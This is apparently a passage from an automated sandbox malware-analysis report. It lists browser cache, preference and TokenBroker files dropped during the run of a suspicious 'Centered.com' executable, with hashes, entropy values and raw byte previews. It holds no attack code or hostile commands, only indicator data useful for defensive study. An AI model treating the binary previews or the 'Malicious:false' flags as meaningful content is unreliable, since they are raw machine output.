                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):575056
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                      MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                      SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                      SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                      SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):460992
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                      MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                      SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                      SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                      SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                      MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                      SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                      SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                      SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:uriCache_

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.022430934740917
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQZC7:YWLSGTt1o9LuLgfGBPAzkVj/T8lQZq
                                                                                                                                                                                                                                                                                      MD5:1F8807A2F08B10BCD54892F2C900134C
                                                                                                                                                                                                                                                                                      SHA1:49B3EEE000CCCF2AFC2AE3674DCD6845FFF9EECE
                                                                                                                                                                                                                                                                                      SHA-256:972AE226C5AE3A5E8FFFDA52FC7C866EB8458BA9C42A8D42572E0585522708D9
                                                                                                                                                                                                                                                                                      SHA-512:F8EE5626675336D49BC33E36FE63B0FE26DBA300CF4E721E08763AF3A388A08A4283BC8AB6BAF9311E87882F36910AE51093535798E92C874AFBD07B09200523
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735387527514934}]}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):86
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                      MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                      SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                      SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                      SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b292295e-d222-456d-8de0-898d1a1b4c0d.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):57647
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103640521999742
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynfPGWv/sxtw7j7VLyMV/YoskFoz:z/0+zI7ynfv/4K7VeZoskG
                                                                                                                                                                                                                                                                                      MD5:6E22A71CA72B8C8CB8BB0B0D8447AC13
                                                                                                                                                                                                                                                                                      SHA1:BBE6B42286958326BCA378C0EB160D62FEA3EE33
                                                                                                                                                                                                                                                                                      SHA-256:C172B822668C30105CA48805482C5395646FD9392FA56BFA7377A0D959A20A5F
                                                                                                                                                                                                                                                                                      SHA-512:20158E69D0A1FD99E3B04798E1D2DA2313517157113478136DC5EFCF18AC9CFDF06CC33C82EAF990FE476076B2E18ACAC2669D87C6D991A4E44A66B720E62BFB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c2900a55-4c4d-4aaf-b2e9-762f1d366aa8.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):58742
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.100533726021432
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:xMk1rT8H1aRgPGWv/sxtwjzbDXlaR5FoS7VLyMV/Yost:xMYrT8V8Ev/4KVUzVeZost
                                                                                                                                                                                                                                                                                      MD5:3CC9A79AA126767C6BE363FA79E6B953
                                                                                                                                                                                                                                                                                      SHA1:8781DC4F650715D4A07AEB3D75B9CA965D8AB6EC
                                                                                                                                                                                                                                                                                      SHA-256:C872BDE566E0F343C477FBAF143CD3A193FEEA1E8598DEF2CD16FEED5BA2C722
                                                                                                                                                                                                                                                                                      SHA-512:14EF1866A773B712F5336F0103CD19EC944073CF91E84B8D20DC6DB4AB2C930A8C20E93341E1A157CAEC0175816577C2E84055B35F00AC6DB0D8C829D31B82A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"207f8458-9b43-4ef3-844e-298c2ec776ca"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735286727"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d95d9323-1f10-41be-a8a0-738ec6747367.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56066
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103048214506423
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynPPGWv/sxtwN7VLyMV/YoskFoz:z/0+zI7ynPv/4K9VeZoskG
                                                                                                                                                                                                                                                                                      MD5:FA0A1C7DF7FC7A605074E3D85A9FA92D
                                                                                                                                                                                                                                                                                      SHA1:687A003AACB6E16792FECBCFD6EAF3627BD2282A
                                                                                                                                                                                                                                                                                      SHA-256:6A908D7959F04E53B535AA3FEAF201952BDD83983A8DED335983FB53F91EF65E
                                                                                                                                                                                                                                                                                      SHA-512:08B1F7089DD480A3E7547AF811618B7D4F53BA04100DB4301AB16CB0DFF803F1A4C068ED23BA2BE84CDD0EE641EFB05C39DE55023DD4B70F6DB4DEA00FE390A9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2278
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8519283563580777
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxrgxddCxl9Il8u2igtWQUNRqYI0xN6KK49ifP/zrCtd1rc:mOoYwiYWQUNpgOifP7rt
                                                                                                                                                                                                                                                                                      MD5:7FF848E6C3C46E8941122C76527FC5B8
                                                                                                                                                                                                                                                                                      SHA1:90E64FBD8AD37CDA7B594044A6170C9DB12105C6
                                                                                                                                                                                                                                                                                      SHA-256:B20DABA61673346873F36BCCAC1D123CCF9803428C2BC62A039D41A8B0FCDD68
                                                                                                                                                                                                                                                                                      SHA-512:1D828E9C0E2C4A2461C439F40AC002814378650D4FBAA3F36A43C284B7B301A5F927AA1165D85F30FADD9AB401F472F30D6BDDFF3B2B860D039CD0C5DAABBAF5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.D.h.I.d.z.5.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.i.3.N.M.2.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4622
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.990389517450565
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:YYwn/u9/k5Xcbx5jioEwptFOyc4XpQk6Znj:Y1udk5XAjHDwq5Sj
                                                                                                                                                                                                                                                                                      MD5:97C07FA75E28CBB2307CA9AE6440E4F3
                                                                                                                                                                                                                                                                                      SHA1:EFAB1DE76D47FA2AEF844C9D88EC6E84A822A611
                                                                                                                                                                                                                                                                                      SHA-256:0B69D480C617338A4E0D6922E966CE3798440792A70276B5EE52E22B5EC367B3
                                                                                                                                                                                                                                                                                      SHA-512:D44B35072C518C23AA50E6C4E54CDBF69105FC43FC28972C2181FABC96798853F5628A8B5087F8870BBEE371E16DBA11F1DCABD92A0F64B3E9BA6D22D6CE0C66
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".e.h.c.y.X.T.Z.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.i.3.N.M.2.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2684
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8958400090752647
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKx68Wa7xM8Jxl9Il8u23L//FmiVyQslrfCN4Kb8pwvCd/vc:a1Yw3L/d4BfCiJs
                                                                                                                                                                                                                                                                                      MD5:EBCF2718FAE8B902956975A96DD68E26
                                                                                                                                                                                                                                                                                      SHA1:D62E1B4D4C1F5C77BB90AD02AD8CCC7B42D9126C
                                                                                                                                                                                                                                                                                      SHA-256:839A038BFA2BD27BBAED6E58C041ADE25F9024723F13FABAA3DA5A9656DBA759
                                                                                                                                                                                                                                                                                      SHA-512:BDD6C7FDAB306679B03E80694CD0CF1369A7B266E165B963322225141B6173508C1DE06FE3E90787B98625736E768920AF405D5A671A938EA5A470C6BA642A0B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.Q.m.3.j.Q.d.3.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.i.3.N.M.2.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\json[1].json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3500
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.397316926131031
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:6NnCeHC5NnCsbC7NnCULD9CXNnCpdgECgNnCiGkCiLNnCTgFDCTINnCcwC0NnC2A:6NGNON9L8NSDNlNHBN1GNW
                                                                                                                                                                                                                                                                                      MD5:DFF84103A0501783AD0436B0CE18FBBF
                                                                                                                                                                                                                                                                                      SHA1:644D9F5B72E9887968061727ABBEFDC43042DBA9
                                                                                                                                                                                                                                                                                      SHA-256:27EEF79547C72C0CC513A846CBFB8F1FBA65772389AD851937ED02889F709E3E
                                                                                                                                                                                                                                                                                      SHA-512:460A6B40CB1C36D1FE0A2AB4BC8445CE5D7CE437FB0092E40DD0E289F85C3E1C592E34A65A722C566593FFD9F0DC8BA3934AB4B49D4EA038E43014D8A95D93DA
                                                                                                                                                                                                                                                                                      Malicious:false
